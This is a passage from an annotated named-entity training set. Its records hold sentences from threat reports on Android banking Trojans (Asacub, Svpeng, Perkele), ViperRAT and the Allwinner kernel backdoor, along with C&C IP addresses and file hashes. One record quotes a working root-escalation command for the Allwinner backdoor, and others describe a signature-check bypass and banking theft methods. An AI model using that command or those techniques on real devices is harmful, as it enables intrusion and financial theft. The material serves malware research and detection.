timestamp ” : ” 1452272572″ } } , { “ command ” : ” sent & & & ” , ” params ” : { “ to ” : ” +79262000900″ , ” body ” : ” BALANCE ” , ” timestamp ” : ” 1452272573″ } } ] Instructions received from the server A comparison can also be made of the format in which Asacub and Smaps forward incoming SMS ( encoded with the base64 algorithm ) from the device to the C & C server : Smaps", "spans": {}, "info": {"id": "cyner_train_001375", "source": "cyner_train"}} {"text": "format Asacub format Decrypted data from Asacub traffic : { “ data ” : ” 2015:10:14_02:41:15″ , ” id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” text ” : ” SSB0aG91Z2h0IHdlIGdvdCBwYXN0IHRoaXMhISBJJ20gbm90IGh1bmdyeSBhbmQgbmU= ” , ” number ” : ” 1790″ , ” type", "spans": {}, "info": {"id": "cyner_train_001376", "source": "cyner_train"}} {"text": "” : ” load ” } Propagation The banking Trojan is propagated via phishing SMS containing a link and an offer to view a photo or MMS .", "spans": {}, "info": {"id": "cyner_train_001377", "source": "cyner_train"}} {"text": "The link points to a web page with a similar sentence and a button for downloading the APK file of the Trojan to the device .", "spans": {}, "info": {"id": "cyner_train_001378", "source": "cyner_train"}} {"text": "App icons under which Asacub masks itself The APK files of the Trojan are downloaded from sites such as mmsprivate [ .", "spans": {"MALWARE: Asacub": [[22, 28]]}, "info": {"id": "cyner_train_001381", "source": "cyner_train"}} {"text": "] site , and mms4you [ .", "spans": {}, "info": {"id": "cyner_train_001384", "source": "cyner_train"}} {"text": "For the Trojan to install , the user must allow installation of apps from unknown sources in the device settings .", "spans": {}, "info": {"id": "cyner_train_001386", "source": "cyner_train"}} {"text": "Infection During installation , depending on the version of the Trojan , Asacub prompts the user either for Device Administrator rights or for permission to use AccessibilityService .", 
"spans": {"MALWARE: Asacub": [[73, 79]]}, "info": {"id": "cyner_train_001387", "source": "cyner_train"}} {"text": "After receiving the rights , it sets itself as the default SMS app and disappears from the device screen .", "spans": {}, "info": {"id": "cyner_train_001388", "source": "cyner_train"}} {"text": "If the user ignores or rejects the request , the window reopens every few seconds .", "spans": {}, "info": {"id": "cyner_train_001389", "source": "cyner_train"}} {"text": "The Trojan requests Device Administrator rights The Trojan requests permission to use AccessibilityService After installation , the Trojan starts communicating with the cybercriminals ’ C & C server .", "spans": {}, "info": {"id": "cyner_train_001390", "source": "cyner_train"}} {"text": "All data is transmitted in JSON format ( after decryption ) .", "spans": {}, "info": {"id": "cyner_train_001391", "source": "cyner_train"}} {"text": "It includes information about the smartphone model , the OS version , the mobile operator , and the Trojan version .", "spans": {}, "info": {"id": "cyner_train_001392", "source": "cyner_train"}} {"text": "Structure of data sent to the server : To begin with , the Trojan sends information about the device to the server : In response , the server sends the code of the command for execution ( “ command ” ) , its parameters ( “ params ” ) , and the time delay before execution ( “ waitrun ” in milliseconds ) .", "spans": {}, "info": {"id": "cyner_train_001394", "source": "cyner_train"}} {"text": "List of commands sewn into the body of the Trojan : Command code Parameters Actions 2 – Sending a list of contacts from the address book of the infected device to the C & C server 7 “ to ” : int Calling the specified number 11 “ to ” : int , “ body ” : string Sending an SMS with the specified text to the specified number 19 “ text ” : string , “ n ” : string Sending SMS with the specified text to numbers from the address book of the infected device , with the name of the 
addressee from the", "spans": {"SYSTEM: address book": [[124, 136], [417, 429]]}, "info": {"id": "cyner_train_001395", "source": "cyner_train"}} {"text": "address book substituted into the message text 40 “ text ” : string Shutting down applications with specific names ( antivirus and banking applications ) The set of possible commands is the most significant difference between the various flavors of Asacub .", "spans": {"SYSTEM: address book": [[0, 12]], "MALWARE: Asacub": [[249, 255]]}, "info": {"id": "cyner_train_001396", "source": "cyner_train"}} {"text": "In later versions , instead of the name of the command , its numerical code was transmitted .", "spans": {}, "info": {"id": "cyner_train_001398", "source": "cyner_train"}} {"text": "The same numerical code corresponded to one command in different versions , but the set of supported commands varied .", "spans": {}, "info": {"id": "cyner_train_001399", "source": "cyner_train"}} {"text": "For example , version 9.0.7 ( 2017 ) featured the following set of commands : 2 , 4 , 8 , 11 , 12 , 15 , 16 , 17 , 18 , 19 , 20 .", "spans": {}, "info": {"id": "cyner_train_001400", "source": "cyner_train"}} {"text": "After receiving the command , the Trojan attempts to execute it , before informing C & C of the execution status and any data received .", "spans": {}, "info": {"id": "cyner_train_001401", "source": "cyner_train"}} {"text": "Moreover , the Trojan intercepts SMS from the bank that contain one-time passwords and information about the balance of the linked bank card .", "spans": {}, "info": {"id": "cyner_train_001403", "source": "cyner_train"}} {"text": "Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS and send them to the required number .", "spans": {}, "info": {"id": "cyner_train_001404", "source": "cyner_train"}} {"text": "What ’ s more , the user can not check the balance via mobile banking or change any settings there , because after receiving the command with code 40 , the 
Trojan prevents the banking app from running on the phone .", "spans": {}, "info": {"id": "cyner_train_001405", "source": "cyner_train"}} {"text": "User messages created by the Trojan during installation typically contain grammatical and spelling errors , and use a mixture of Cyrillic and Latin characters .", "spans": {}, "info": {"id": "cyner_train_001406", "source": "cyner_train"}} {"text": "The Trojan also employs various obfuscation methods : from the simplest , such as string concatenation and renaming of classes and methods , to implementing functions in native code and embedding SO libraries in C/C++ in the APK file , which requires the use of additional tools or dynamic analysis for deobfuscation , since most tools for static analysis of Android apps support only Dalvik bytecode .", "spans": {}, "info": {"id": "cyner_train_001407", "source": "cyner_train"}} {"text": "In some versions of Asacub , strings in the app are encrypted using the same algorithm as data sent to C & C , but with different keys .", "spans": {"MALWARE: Asacub": [[20, 26]]}, "info": {"id": "cyner_train_001408", "source": "cyner_train"}} {"text": "The Trojan also hit users from Ukraine , Turkey , Germany , Belarus , Poland , Armenia , Kazakhstan , the US , and other countries .", "spans": {}, "info": {"id": "cyner_train_001410", "source": "cyner_train"}} {"text": "Conclusion The case of Asacub shows that mobile malware can function for several years with minimal changes to the distribution scheme .", "spans": {"MALWARE: Asacub": [[23, 29]]}, "info": {"id": "cyner_train_001411", "source": "cyner_train"}} {"text": "That said , so as to hinder detection of new versions , the Trojan ’ s APK file and the C & C server domains are changed regularly , and the Trojan download links are often one-time-use .", "spans": {}, "info": {"id": "cyner_train_001415", "source": "cyner_train"}} {"text": "IOCs C & C IP addresses : 155.133.82.181 155.133.82.240 155.133.82.244 185.234.218.59 195.22.126.160 
195.22.126.163 195.22.126.80 195.22.126.81 5.45.73.24 5.45.74.130 IP addresses from which the Trojan was downloaded : 185.174.173.31 185.234.218.59 188.166.156.110 195.22.126.160 195.22.126.80 195.22.126.81", "spans": {}, "info": {"id": "cyner_train_001416", "source": "cyner_train"}} {"text": "195.22.126.82 195.22.126.83 SHA256 : 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637 df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8", "spans": {}, "info": {"id": "cyner_train_001417", "source": "cyner_train"}} {"text": "c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184 d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9 27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c", "spans": {}, "info": {"id": "cyner_train_001418", "source": "cyner_train"}} {"text": "31edacd064debdae892ab0bc788091c58a03808997e11b6c46a6a5de493ed25d 87ffec0fe0e7a83e6433694d7f24cfde2f70fc45800aa2acb8e816ceba428951 eabc604fe6b5943187c12b8635755c303c450f718cc0c8e561df22a27264f101 Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM", "spans": {"SYSTEM: ARM": [[255, 258]]}, "info": {"id": "cyner_train_001419", "source": "cyner_train"}} {"text": "Maker May 12 , 2016 Mohit Kumar How to Hack an Android device ?", "spans": {"SYSTEM: Android": [[47, 54]]}, "info": {"id": "cyner_train_001420", "source": "cyner_train"}} {"text": "It is possibly one of the most frequently asked questions on the Internet .", "spans": {}, "info": {"id": "cyner_train_001421", "source": "cyner_train"}} {"text": "Thanks to Allwinner , a Chinese ARM system-on-a-chip maker , which has recently been caught shipping a version of Linux Kernel with an incredibly simple and easy-to-use built-in backdoor .", "spans": {"ORGANIZATION: Allwinner": [[10, 19]], "SYSTEM: 
ARM": [[32, 35]], "SYSTEM: Linux": [[114, 119]]}, "info": {"id": "cyner_train_001423", "source": "cyner_train"}} {"text": "Simple Backdoor Exploit to Hack Android Devices All you need to do to gain root access of an affected Android device is… Send the text \" rootmydevice '' to any undocumented debugging process .", "spans": {"SYSTEM: Android": [[32, 39], [102, 109]]}, "info": {"id": "cyner_train_001425", "source": "cyner_train"}} {"text": "The local privileges escalation backdoor code for debugging ARM-powered Android devices managed to make its way in shipped firmware after firmware makers wrote their own kernel code underneath a custom Android build for their devices , though the mainstream kernel source is unaffected .", "spans": {"SYSTEM: ARM-powered": [[60, 71]], "SYSTEM: Android": [[72, 79], [202, 209]]}, "info": {"id": "cyner_train_001426", "source": "cyner_train"}} {"text": "The backdoor code is believed to have been left by mistake by the authors after completing the debugging process .", "spans": {}, "info": {"id": "cyner_train_001427", "source": "cyner_train"}} {"text": "For exploiting this issue , any process running with any UID can be converted into root easily by simply using the following command : echo \" rootmydevice '' > /proc/sunxi_debug/sunxi_debug The Linux 3.4-sunxi kernel was originally designed to support the Android operating system on Allwinner ARM for tablets , but later it was used to port Linux to many Allwinner processors on boards like Banana Pi micro-PCs , Orange Pi , and other devices .", "spans": {"SYSTEM: Android": [[256, 263]], "ORGANIZATION: Allwinner": [[284, 293], [356, 365]], "SYSTEM: ARM": [[294, 297]], "SYSTEM: Linux": [[342, 347]], "SYSTEM: Banana Pi micro-PCs": [[392, 411]], "SYSTEM: Orange Pi": [[414, 423]]}, "info": {"id": "cyner_train_001428", "source": "cyner_train"}} {"text": "At the forum of the Armbian operating system , a moderator who goes by the name Tkaiser noted that the backdoor code could remotely be 
exploitable \" if combined with networked services that might allow access to /proc .", "spans": {"SYSTEM: Armbian": [[20, 27]]}, "info": {"id": "cyner_train_001429", "source": "cyner_train"}} {"text": "'' This security hole is currently present in every operating system image for A83T , H3 or H8 devices that rely on kernel 3.4 , he added .", "spans": {"SYSTEM: A83T": [[79, 83]], "SYSTEM: H3": [[86, 88]], "SYSTEM: H8": [[92, 94]], "SYSTEM: kernel 3.4": [[116, 126]]}, "info": {"id": "cyner_train_001430", "source": "cyner_train"}} {"text": "This blunder made by the company has been frustrating to many developers .", "spans": {}, "info": {"id": "cyner_train_001431", "source": "cyner_train"}} {"text": "David Manouchehri released the information about the backdoor through its own Github account ( Pastebin ) and then apparently deleted it .", "spans": {"ORGANIZATION: Github": [[78, 84]], "ORGANIZATION: Pastebin": [[95, 103]]}, "info": {"id": "cyner_train_001433", "source": "cyner_train"}} {"text": "It is safe to say that today ’ s cybercriminal is no longer a lone hacker but part of a serious business operation .", "spans": {}, "info": {"id": "cyner_train_001435", "source": "cyner_train"}} {"text": "There are various types of actors involved in the mobile malware industry : virus writers , testers , interface designers of both the malicious apps and the web pages they are distributed from , owners of the partner programs that spread the malware , and mobile botnet owners .", "spans": {}, "info": {"id": "cyner_train_001436", "source": "cyner_train"}} {"text": "This division of labor among the cybercriminals can also be seen in the behavior of their Trojans .", "spans": {}, "info": {"id": "cyner_train_001437", "source": "cyner_train"}} {"text": "In 2013 , there was evidence of cooperation ( most probably on a commercial basis ) between different groups of virus writers .", "spans": {}, "info": {"id": "cyner_train_001438", "source": "cyner_train"}} {"text": "For example , 
the botnet Trojan-SMS.AndroidOS.Opfake.a , in addition to its own activity , also spread Backdoor.AndroidOS.Obad.a by sending spam containing a link to the malware to the victim ’ s list of contacts .", "spans": {"MALWARE: Trojan-SMS.AndroidOS.Opfake.a": [[25, 54]], "MALWARE: Backdoor.AndroidOS.Obad.a": [[103, 128]]}, "info": {"id": "cyner_train_001439", "source": "cyner_train"}} {"text": "2013 in figures A total of 143,211 new modifications of malicious programs targeting mobile devices were detected in all of 2013 ( as of January 1 , 2014 ) .", "spans": {}, "info": {"id": "cyner_train_001441", "source": "cyner_train"}} {"text": "In 2013 , 3,905,502 installation packages were used by cybercriminals to distribute mobile malware .", "spans": {}, "info": {"id": "cyner_train_001442", "source": "cyner_train"}} {"text": "Android remains a prime target for malicious attacks .", "spans": {"SYSTEM: Android": [[0, 7]]}, "info": {"id": "cyner_train_001444", "source": "cyner_train"}} {"text": "98.05 % of all malware detected in 2013 targeted this platform , confirming both the popularity of this mobile OS and the vulnerability of its architecture .", "spans": {}, "info": {"id": "cyner_train_001445", "source": "cyner_train"}} {"text": "Most mobile malware is designed to steal users ’ money , including SMS-Trojans , and lots of backdoors and Trojans .", "spans": {}, "info": {"id": "cyner_train_001446", "source": "cyner_train"}} {"text": "Over the year , the number of mobile malware modifications designed for phishing , the theft of credit card information and money increased by a factor of 19.7 .", "spans": {}, "info": {"id": "cyner_train_001447", "source": "cyner_train"}} {"text": "In 2013 , Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans .", "spans": {"ORGANIZATION: Kaspersky Lab": [[10, 23]]}, "info": {"id": "cyner_train_001448", "source": "cyner_train"}} {"text": "Methods and techniques 2013 not only saw a radical increase in output from mobile 
virus writers but also saw them actively applying methods and technologies that allowed cybercriminals to use their malware more effectively .", "spans": {}, "info": {"id": "cyner_train_001449", "source": "cyner_train"}} {"text": "Infecting legal web resources help spread mobile malware via popular websites .", "spans": {}, "info": {"id": "cyner_train_001452", "source": "cyner_train"}} {"text": "The purely nominal control over the applications uploaded to these stores means attackers can conceal Trojans in apps made to look like innocent games or utilities .", "spans": {}, "info": {"id": "cyner_train_001457", "source": "cyner_train"}} {"text": "Distribution via botnets .", "spans": {}, "info": {"id": "cyner_train_001458", "source": "cyner_train"}} {"text": "We also registered one episode of mobile malware spreading via a third-party botnet .", "spans": {}, "info": {"id": "cyner_train_001460", "source": "cyner_train"}} {"text": "Resistance to anti-malware protection The ability of malicious software to operate continuously on the victim ’ s mobile device is an important aspect of its development .", "spans": {}, "info": {"id": "cyner_train_001461", "source": "cyner_train"}} {"text": "The longer a Trojan “ lives ” on a smartphone , the more money it will make for the owner .", "spans": {}, "info": {"id": "cyner_train_001462", "source": "cyner_train"}} {"text": "The more complex the obfuscation , the longer it will take an antivirus solution to neutralize the malicious code .", "spans": {}, "info": {"id": "cyner_train_001465", "source": "cyner_train"}} {"text": "Tellingly , current virus writers have mastered commercial obfuscators .", "spans": {}, "info": {"id": "cyner_train_001466", "source": "cyner_train"}} {"text": "This implies they have made considerable investments .", "spans": {}, "info": {"id": "cyner_train_001467", "source": "cyner_train"}} {"text": "For example , one commercial obfuscator , which cost €350 , was used for Trojans and Opfak.bo Obad.a Android 
vulnerabilities are used by criminals for three reasons : to bypass the code integrity check when installing an application ( vulnerability Master Key ) ; to enhance the rights of malicious applications , considerably extending their capabilities ; and to make it more difficult to remove malware .", "spans": {"MALWARE: Opfak.bo Obad.a": [[85, 100]]}, "info": {"id": "cyner_train_001468", "source": "cyner_train"}} {"text": "For example , Svpeng uses a previously unknown vulnerability to protect itself from being removed manually or by the antivirus program .", "spans": {"MALWARE: Svpeng": [[14, 20]]}, "info": {"id": "cyner_train_001469", "source": "cyner_train"}} {"text": "Cybercriminals also exploit the Master Key vulnerability and have learned to embed unsigned executable files in Android installation packages .", "spans": {"VULNERABILITY: Master Key vulnerability": [[32, 56]], "SYSTEM: Android": [[112, 119]]}, "info": {"id": "cyner_train_001470", "source": "cyner_train"}} {"text": "Digital signature verification can be bypassed by giving the malicious file exactly the same name as a legitimate file and placing it on the same level in the archive .", "spans": {}, "info": {"id": "cyner_train_001471", "source": "cyner_train"}} {"text": "However , many users are in no hurry to update the operating systems of their products .", "spans": {}, "info": {"id": "cyner_train_001474", "source": "cyner_train"}} {"text": "If a smartphone or tablet was released more than a year ago , it is probably no longer supported by the manufacturer and patching of vulnerabilities is no longer provided .", "spans": {}, "info": {"id": "cyner_train_001475", "source": "cyner_train"}} {"text": "Of course , this does not mean the digital signature of the software developer can be used .", "spans": {}, "info": {"id": "cyner_train_001478", "source": "cyner_train"}} {"text": "However , due to the absence of certification centers verifying the digital signatures of Android programs , nothing prevents 
criminals from adding their own signature .", "spans": {}, "info": {"id": "cyner_train_001479", "source": "cyner_train"}} {"text": "As a result , a copy of Angry Birds installed from an unofficial app store or downloaded from a forum could easily contain malicious functionality .", "spans": {"SYSTEM: Angry Birds": [[24, 35]]}, "info": {"id": "cyner_train_001480", "source": "cyner_train"}} {"text": "Capabilities and functionality In 2013 , we detected several technological innovations developed and used by criminals in their malicious software .", "spans": {}, "info": {"id": "cyner_train_001481", "source": "cyner_train"}} {"text": "Below are descriptions of some of the most interesting .", "spans": {}, "info": {"id": "cyner_train_001482", "source": "cyner_train"}} {"text": "Control of malware from a single center provides maximum flexibility .", "spans": {}, "info": {"id": "cyner_train_001483", "source": "cyner_train"}} {"text": "Botnets can make considerably more money than autonomous Trojans .", "spans": {}, "info": {"id": "cyner_train_001484", "source": "cyner_train"}} {"text": "It comes as no surprise then that many SMS-Trojans include bot functionality .", "spans": {}, "info": {"id": "cyner_train_001485", "source": "cyner_train"}} {"text": "According to our estimates , about 60 % of mobile malware are elements of both large and small mobile botnets .", "spans": {}, "info": {"id": "cyner_train_001486", "source": "cyner_train"}} {"text": "Google Cloud Messaging is designed to send short message ( up to 4 KB ) to mobile devices via Google services .", "spans": {"SYSTEM: Google Cloud Messaging": [[0, 22]], "ORGANIZATION: Google": [[94, 100]]}, "info": {"id": "cyner_train_001488", "source": "cyner_train"}} {"text": "The commands received via GCM can not be blocked immediately on an infected device .", "spans": {"SYSTEM: GCM": [[26, 29]]}, "info": {"id": "cyner_train_001490", "source": "cyner_train"}} {"text": "We have detected several malicious programs using GCM 
for command and control – the widespread Trojan-SMS.AndroidOS.FakeInst.a , Trojan-SMS.AndroidOS.Agent.ao , and Trojan-SMS.AndroidOS.OpFake.a among others .", "spans": {"SYSTEM: GCM": [[50, 53]], "MALWARE: Trojan-SMS.AndroidOS.FakeInst.a": [[95, 126]], "MALWARE: Trojan-SMS.AndroidOS.Agent.ao": [[129, 158]], "MALWARE: Trojan-SMS.AndroidOS.OpFake.a": [[165, 194]]}, "info": {"id": "cyner_train_001491", "source": "cyner_train"}} {"text": "Google is actively combating this use of the service , responding quickly to reports from antivirus companies and blocking the IDs of cybercriminals .", "spans": {"ORGANIZATION: Google": [[0, 6]]}, "info": {"id": "cyner_train_001492", "source": "cyner_train"}} {"text": "Attacks on Windows XP allows mobile malware to infect a PC after connecting a smartphone or tablet .", "spans": {"SYSTEM: Windows XP": [[11, 21]]}, "info": {"id": "cyner_train_001493", "source": "cyner_train"}} {"text": "In early 2013 we detected two identical applications on Google Play that were allegedly designed for cleaning the operating system of Android-based devices from unnecessary processes .", "spans": {"SYSTEM: Google Play": [[56, 67]], "SYSTEM: Android-based": [[134, 147]]}, "info": {"id": "cyner_train_001494", "source": "cyner_train"}} {"text": "In fact , the applications are designed to download the autorun.inf file , an icon file and the win32-Trojan file , which the mobile malicious program locates in the root directory of an SD card .", "spans": {"SYSTEM: win32-Trojan": [[96, 108]], "SYSTEM: SD card": [[187, 194]]}, "info": {"id": "cyner_train_001495", "source": "cyner_train"}} {"text": "We would like to emphasize that this method of attack only works on Windows XP and Android versions prior to 2.2 .", "spans": {"SYSTEM: Windows XP": [[68, 78]], "SYSTEM: Android": [[83, 90]]}, "info": {"id": "cyner_train_001498", "source": "cyner_train"}} {"text": "The most advanced mobile malicious programs today are Trojans targeting users ’ bank accounts – the most 
attractive source of criminal earnings .", "spans": {}, "info": {"id": "cyner_train_001499", "source": "cyner_train"}} {"text": "Trend of the year : mobile banking Trojans 2013 was marked by a rapid rise in the number of Android banking Trojans .", "spans": {"SYSTEM: Android": [[92, 99]]}, "info": {"id": "cyner_train_001500", "source": "cyner_train"}} {"text": "The cyber industry of mobile malware is becoming more focused on making profits more effectively , i.e. , mobile phishing , theft of credit card information , money transfers from bank cards to mobile phones and from phones to the criminalas ’ e-wallets .", "spans": {}, "info": {"id": "cyner_train_001501", "source": "cyner_train"}} {"text": "Cybercriminals have become obsessed by this method of illegal earnings : at the beginning of the year we knew only 67 banking Trojans , but by the end of the year there were already 1321 unique samples .", "spans": {}, "info": {"id": "cyner_train_001502", "source": "cyner_train"}} {"text": "Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans .", "spans": {"SYSTEM: Kaspersky Lab": [[0, 13]]}, "info": {"id": "cyner_train_001503", "source": "cyner_train"}} {"text": "However , in 2013 , autonomous mobile banking Trojans developed further .", "spans": {}, "info": {"id": "cyner_train_001505", "source": "cyner_train"}} {"text": "mobile_treats_2013_05s Infections caused by mobile banking programs Today , the majority of banking Trojan attacks affect users in Russia and the CIS .", "spans": {}, "info": {"id": "cyner_train_001507", "source": "cyner_train"}} {"text": "However , this situation will not last long : given the cybercriminals ’ interest in user bank accounts , the activity of mobile banking Trojans is expected to grow in other countries in 2014 .", "spans": {}, "info": {"id": "cyner_train_001508", "source": "cyner_train"}} {"text": "It can not act independently and operates strictly in accordance with commands received from the C & C server .", 
"spans": {}, "info": {"id": "cyner_train_001511", "source": "cyner_train"}} {"text": "There the user is prompted to download and install a Trojan imitating an Adobe Flash Player update .", "spans": {"SYSTEM: Adobe Flash Player": [[73, 91]]}, "info": {"id": "cyner_train_001513", "source": "cyner_train"}} {"text": "Svpeng is capable of doing lots of things .", "spans": {"MALWARE: Svpeng": [[0, 6]]}, "info": {"id": "cyner_train_001514", "source": "cyner_train"}} {"text": "It collects information about the smartphone ( IMEI , country , service provider , operating system language ) and sends it to the host via the HTTP POST request .", "spans": {}, "info": {"id": "cyner_train_001515", "source": "cyner_train"}} {"text": "This appears to be necessary to determine the number of banks the victim may use .", "spans": {}, "info": {"id": "cyner_train_001516", "source": "cyner_train"}} {"text": "It steals SMS messages and information about voice calls .", "spans": {}, "info": {"id": "cyner_train_001519", "source": "cyner_train"}} {"text": "It steals money from the victim ’ s bank account .", "spans": {}, "info": {"id": "cyner_train_001521", "source": "cyner_train"}} {"text": "Svpeng sends the corresponding messages to the SMS services of two banks .", "spans": {"MALWARE: Svpeng": [[0, 6]]}, "info": {"id": "cyner_train_001524", "source": "cyner_train"}} {"text": "Svpeng does this to check if the cards from these banks are attached to the number of the infected phone and to find out the account balance .", "spans": {"MALWARE: Svpeng": [[0, 6]]}, "info": {"id": "cyner_train_001525", "source": "cyner_train"}} {"text": "If the phone is attached to a bank card , commands are sent from the C & C server with instructions to transfer money from the user ’ s bank account to his/her mobile account .", "spans": {}, "info": {"id": "cyner_train_001526", "source": "cyner_train"}} {"text": "The cybercriminals then send this money to a digital wallet or to a premium number and cash it in .", 
"spans": {}, "info": {"id": "cyner_train_001527", "source": "cyner_train"}} {"text": "It steals logins and passwords to online banking accounts by substituting he window displayed by the bank application .", "spans": {}, "info": {"id": "cyner_train_001528", "source": "cyner_train"}} {"text": "Currently , this only affects Russian banks , but the technology behind Svpeng could easily be used to target other banking applications .", "spans": {"MALWARE: Svpeng": [[72, 78]]}, "info": {"id": "cyner_train_001529", "source": "cyner_train"}} {"text": "The data entered by the user is sent to the cybercriminals .", "spans": {}, "info": {"id": "cyner_train_001532", "source": "cyner_train"}} {"text": "In actual fact , the Trojan does not block anything and the phone can be used without any problems .", "spans": {}, "info": {"id": "cyner_train_001534", "source": "cyner_train"}} {"text": "It hides traces of its activity by masking the outgoing and incoming text messages and blocking calls and messages from numbers belonging to the bank .", "spans": {}, "info": {"id": "cyner_train_001535", "source": "cyner_train"}} {"text": "It is impossible to deprive it of these rights without the use of specialized tools ( such as Kaspersky Internet Security for Android ) .", "spans": {"SYSTEM: Kaspersky Internet Security": [[94, 121]], "SYSTEM: Android": [[126, 133]]}, "info": {"id": "cyner_train_001539", "source": "cyner_train"}} {"text": "To protect itself from being removed , Svpeng uses a previously unknown vulnerability in Android .", "spans": {"MALWARE: Svpeng": [[39, 45]], "SYSTEM: Android": [[89, 96]]}, "info": {"id": "cyner_train_001540", "source": "cyner_train"}} {"text": "But , as we have already mentioned , the criminals could easily turn their attention to users in other countries .", "spans": {}, "info": {"id": "cyner_train_001543", "source": "cyner_train"}} {"text": "Perkele and Wroba Foreign users have also been on the receiving end of several malicious innovations targeting 
bank accounts .", "spans": {"MALWARE: Perkele": [[0, 7]], "MALWARE: Wroba": [[12, 17]]}, "info": {"id": "cyner_train_001544", "source": "cyner_train"}} {"text": "It is of interest primarily because it operates in conjunction with various banking win32-Trojans .", "spans": {"SYSTEM: win32-Trojans": [[84, 97]]}, "info": {"id": "cyner_train_001546", "source": "cyner_train"}} {"text": "Its main task is to bypass the two-factor authentication of the client in the online banking system .", "spans": {}, "info": {"id": "cyner_train_001547", "source": "cyner_train"}} {"text": "Due to the specific nature of its activity , Perkele is distributed in a rather unusual way .", "spans": {"MALWARE: Perkele": [[45, 52]]}, "info": {"id": "cyner_train_001548", "source": "cyner_train"}} {"text": "When a user enters an Internet banking site on a computer infected by banking malware ( ZeuS , Citadel ) , a request about the smartphone number and type of operating system is injected into the code of the authentication page .", "spans": {"MALWARE: ZeuS": [[88, 92]], "MALWARE: Citadel": [[95, 102]]}, "info": {"id": "cyner_train_001549", "source": "cyner_train"}} {"text": "After scanning the QR code and installing a component downloaded from the link , the user infects his smartphone with the Trojan program that boasts functionality that is of great interest to the attackers .", "spans": {}, "info": {"id": "cyner_train_001551", "source": "cyner_train"}} {"text": "Perkele intercepts mTANs ( confirmation codes for banking operations ) sent by the bank via text message .", "spans": {"MALWARE: Perkele": [[0, 7]]}, "info": {"id": "cyner_train_001552", "source": "cyner_train"}} {"text": "By using the login and password stolen from the browser , the Windows Trojan initiates a fake transaction while Perkele intercepts ( via the C & C server ) the mTAN sent by the bank to the user .", "spans": {"MALWARE: Perkele": [[112, 119]]}, "info": {"id": "cyner_train_001553", "source": "cyner_train"}} {"text": 
"Money then disappears from the victim ’ s account and is cashed in without the owner ’ s knowledge .", "spans": {}, "info": {"id": "cyner_train_001554", "source": "cyner_train"}} {"text": "The Korean malware Wroba , in addition to the traditional vector of infection via file-sharing services , spreads via alternative app stores .", "spans": {"MALWARE: Wroba": [[19, 24]]}, "info": {"id": "cyner_train_001555", "source": "cyner_train"}} {"text": "However , they possess no banking functions , and merely steal the logins and passwords entered by users .", "spans": {}, "info": {"id": "cyner_train_001559", "source": "cyner_train"}} {"text": "We also discovered and analyzed live , misconfigured malicious command and control servers ( C2 ) , from which we were able to identify how the attacker gets new , infected apps to secretly install and the types of activities they are monitoring .", "spans": {}, "info": {"id": "cyner_train_001563", "source": "cyner_train"}} {"text": "In addition , we uncovered the IMEIs of the targeted individuals ( IMEIs will not be shared publicly for the privacy and safety of the victims ) as well as the types of exfiltrated content .", "spans": {}, "info": {"id": "cyner_train_001564", "source": "cyner_train"}} {"text": "In aggregate , the type of information stolen could let an attacker know where a person is , with whom they are associated ( including contacts ’ profile photos ) , the messages they are sending , the websites they visit and search history , screenshots that reveal data from other apps on the device , the conversations they have in the presence of the device , and a myriad of images including anything at which device ’ s camera is pointed .", "spans": {}, "info": {"id": "cyner_train_001565", "source": "cyner_train"}} {"text": "Lookout has determined ViperRAT is a very sophisticated threat that adds to the mounting evidence that targeted mobile attacks against governments and business is a real problem .", "spans": {"ORGANIZATION: 
Lookout": [[0, 7]], "MALWARE: ViperRAT": [[23, 31]]}, "info": {"id": "cyner_train_001566", "source": "cyner_train"}} {"text": "Given that this is an active threat , we ’ ve been working behind-the-scenes with our customers to ensure both personal and enterprise customers are protected from this threat and only decided to come forward with this information after the research team at Kaspersky released a report earlier today .", "spans": {"ORGANIZATION: Kaspersky": [[258, 267]]}, "info": {"id": "cyner_train_001568", "source": "cyner_train"}} {"text": "Additionally , we have determined that though original reports of this story attribute this surveillanceware tool to Hamas , this may not be the case , as we demonstrate below .", "spans": {"ORGANIZATION: Hamas": [[117, 122]]}, "info": {"id": "cyner_train_001569", "source": "cyner_train"}} {"text": "The increasing sophistication of surveillanceware The structure of the surveillanceware indicates it is very sophisticated .", "spans": {}, "info": {"id": "cyner_train_001570", "source": "cyner_train"}} {"text": "Analysis indicates there are currently two distinct variants of ViperRAT .", "spans": {"MALWARE: ViperRAT": [[64, 72]]}, "info": {"id": "cyner_train_001571", "source": "cyner_train"}} {"text": "The first variant involves social engineering the target into downloading a trojanized app .", "spans": {}, "info": {"id": "cyner_train_001573", "source": "cyner_train"}} {"text": "After building an initial rapport with targets , the actors behind these social media accounts would instruct victims to install an additional app for easier communication .", "spans": {}, "info": {"id": "cyner_train_001575", "source": "cyner_train"}} {"text": "We also uncovered ViperRAT in a billiards game , an Israeli Love Songs player , and a Move To iOS app .", "spans": {"MALWARE: ViperRAT": [[18, 26]], "SYSTEM: iOS": [[94, 97]]}, "info": {"id": "cyner_train_001577", "source": "cyner_train"}} {"text": "The second stage The second stage apps 
